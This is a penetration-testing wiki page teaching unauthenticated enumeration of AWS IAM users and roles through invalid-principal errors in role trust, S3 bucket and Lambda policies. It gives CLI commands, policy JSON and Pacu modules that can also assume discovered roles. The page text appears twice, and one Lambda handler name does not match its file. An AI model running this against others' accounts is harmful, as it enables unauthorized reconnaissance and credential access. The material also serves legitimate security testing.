Enumerate (Unauthenticated) IAM Users and Roles

Exploiting an AWS feature of the IAM Role Trust Policy allowing for unauthenticated enumeration of AWS IAM Users and Roles in AWS Accounts.

PreviousEnumerate AWS IAM Users NextEnumerate AWS Public Resources

Last updated 5 months ago

Was this helpful?

Enumerate (Unauthenticated) IAM Users and Roles

Exploiting an AWS feature of the IAM Role Trust Policy allowing for unauthenticated enumeration of AWS IAM Users and Roles in AWS Accounts.

We need to know the AWS Account ID for this technique to work. Refer to Enumerate AWS Account IDs for methods on how to obtain this.

Rhino Security Labs has a detailing how this works

Unauthenticated Enumeration of IAM Users and Roles

Essentially, when updating an IAM Role's Trust Policy, AWS will either allow it or return an error
The error is returned if the ARN of the identity does not exist

Leveraging AWS Console

First, create an IAM Role and then update its Trust Policy
Principals can be specified in an IAM Role's policy and will provide an error if the principal is invalid

Leveraging AWS CLI

Principals can be specified in an IAM Role's policy and will provide an error if the principal is invalid

Create an IAM Role Policy with a valid principal

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::111111111111:user/valid-user"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Create the IAM Role

aws iam create-role --role-name myRole --assume-role-policy-document file://roletrustpolicy.json

Update Policy with user/role to test

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::111111111111:user/bob"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Update the Role with the new Policy

aws --profile lab iam update-assume-role-policy --role-name <MyRoleName> --policy-document file://roletrustpolicy.json

An error occurred (MalformedPolicyDocument) when calling the UpdateAssumeRolePolicy operation: Invalid principal in policy: "AWS":"arn:aws:iam::111111111111:user/bob"

Leveraging Pacu

Pacu will also attempt to assume the role which will provide credentials for the role
Default wordlists are used unless you specify your own

run iam__enum_users --role-name <MyRoleName> --account-id 111111111111

run iam__enum_roles --role-name <MyRoleName> --account-id 111111111111

run iam__enum_users --role-name <MyRoleName> --account-id 111111111111 --word-list <myUser/RoleList>

Leveraging S3

Principals can be specified in an S3 Bucket's policy and will provide an error if the principal is invalid

aws s3api create-bucket --bucket <bucketName>

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<targetAccountId>:user/bob"
            },
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::<bucketName>"
        }
    ]
}

aws s3api put-bucket-policy --bucket <bucketName> --policy file://s3bucketpolicy.json

An error occurred (MalformedPolicy) when calling the PutBucketPolicy operation: Invalid principal in policy

Leveraging Lambda

Principals can be specified in a Lambda Function's resource policy and will provide an error if the principal is invalid

Create Trust Policy for IAM Role

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Service": "lambda.amazonaws.com"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Create IAM Role

aws iam create-role --role-name lambda-role --assume-role-policy-document file://lambdapolicy.json

Create Function Code

def lambda_handler(event, context):
    print(event)
    return 'Hello from Lambda!'

Zip the Function Code

zip functioncode.zip functioncode.py

Create the Function

aws lambda create-function --function-name tylertestiamprincipals --runtime python3.9 --zip-file fileb://functioncode.zip --handler hello.lambda-handler --role arn:aws:iam::111111111111:role/lambda-role

aws lambda add-permission --function-name tylertestiamprincipals --action lambda:ListFunctions --statement-id tylertestiamprincipals2 --principal "arn:aws:iam::111111111111:role/sally"

An error occurred (InvalidParameterValueException) when calling the AddPermission operation: The provided principal was invalid. Please check the principal and try again.

PreviousEnumerate AWS IAM Users NextEnumerate AWS Public Resources

Last updated 5 months ago

Was this helpful?

We need to know the AWS Account ID for this technique to work. Refer to Enumerate AWS Account IDs for methods on how to obtain this.

Rhino Security Labs has a detailing how this works

Unauthenticated Enumeration of IAM Users and Roles

Essentially, when updating an IAM Role's Trust Policy, AWS will either allow it or return an error
The error is returned if the ARN of the identity does not exist

Leveraging AWS Console

First, create an IAM Role and then update its Trust Policy
Principals can be specified in an IAM Role's policy and will provide an error if the principal is invalid

Leveraging AWS CLI

Principals can be specified in an IAM Role's policy and will provide an error if the principal is invalid

Create an IAM Role Policy with a valid principal

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::111111111111:user/valid-user"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Create the IAM Role

aws iam create-role --role-name myRole --assume-role-policy-document file://roletrustpolicy.json

Update Policy with user/role to test

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::111111111111:user/bob"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Update the Role with the new Policy

aws --profile lab iam update-assume-role-policy --role-name <MyRoleName> --policy-document file://roletrustpolicy.json

An error occurred (MalformedPolicyDocument) when calling the UpdateAssumeRolePolicy operation: Invalid principal in policy: "AWS":"arn:aws:iam::111111111111:user/bob"

Leveraging Pacu

provides modules that automatically attempt to enumerate valid IAM Users and Roles in an AWS account using this method
Pacu will also attempt to assume the role which will provide credentials for the role
Default wordlists are used unless you specify your own

run iam__enum_users --role-name <MyRoleName> --account-id 111111111111

run iam__enum_roles --role-name <MyRoleName> --account-id 111111111111

run iam__enum_users --role-name <MyRoleName> --account-id 111111111111 --word-list <myUser/RoleList>

Leveraging S3

Principals can be specified in an S3 Bucket's policy and will provide an error if the principal is invalid

aws s3api create-bucket --bucket <bucketName>

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<targetAccountId>:user/bob"
            },
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::<bucketName>"
        }
    ]
}

aws s3api put-bucket-policy --bucket <bucketName> --policy file://s3bucketpolicy.json

An error occurred (MalformedPolicy) when calling the PutBucketPolicy operation: Invalid principal in policy

Leveraging Lambda

Principals can be specified in a Lambda Function's resource policy and will provide an error if the principal is invalid

Create Trust Policy for IAM Role

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Service": "lambda.amazonaws.com"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Create IAM Role

aws iam create-role --role-name lambda-role --assume-role-policy-document file://lambdapolicy.json

Create Function Code

def lambda_handler(event, context):
    print(event)
    return 'Hello from Lambda!'

Zip the Function Code

zip functioncode.zip functioncode.py

Create the Function

aws lambda create-function --function-name tylertestiamprincipals --runtime python3.9 --zip-file fileb://functioncode.zip --handler hello.lambda-handler --role arn:aws:iam::111111111111:role/lambda-role

aws lambda add-permission --function-name tylertestiamprincipals --action lambda:ListFunctions --statement-id tylertestiamprincipals2 --principal "arn:aws:iam::111111111111:role/sally"

An error occurred (InvalidParameterValueException) when calling the AddPermission operation: The provided principal was invalid. Please check the principal and try again.